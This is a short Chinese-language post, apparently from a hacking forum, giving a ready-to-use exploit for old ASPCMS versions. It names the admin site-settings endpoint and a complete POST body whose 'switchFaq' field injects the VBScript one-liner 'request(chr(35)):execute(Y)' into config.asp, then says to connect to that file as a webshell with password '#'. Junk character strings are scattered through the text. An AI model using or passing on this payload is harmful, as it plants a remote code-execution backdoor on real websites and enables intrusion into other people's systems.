老的ASPCMS版本的秒杀拿SHELL漏洞
# ~ ]. Z9 @: S4 X4 O
# z4 m1 Z& w$ n7 K" z0 y 找到后台。。。然后/ q: [* q, ^. c& k- V% G- W) m
, L& r! B9 I, F/ P' G6 J) h7 p/admin/_system/AspCms_SiteSetting.asp?action=saves
0 b7 {3 B$ O5 [7 S
3 f) `- V) n+ Q' Q+ T+ f4 c直接POST4 L- C( l }! b: o: B9 g% q5 H
: c# V3 f, D; e1 a- NrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
, g3 v. _% Q4 o
# J& `1 H# m3 L7 X3 X) q( {" m再连接配置文件config.asp 密码为#
4 T. u' G# N3 U5 z; u. K( b( H |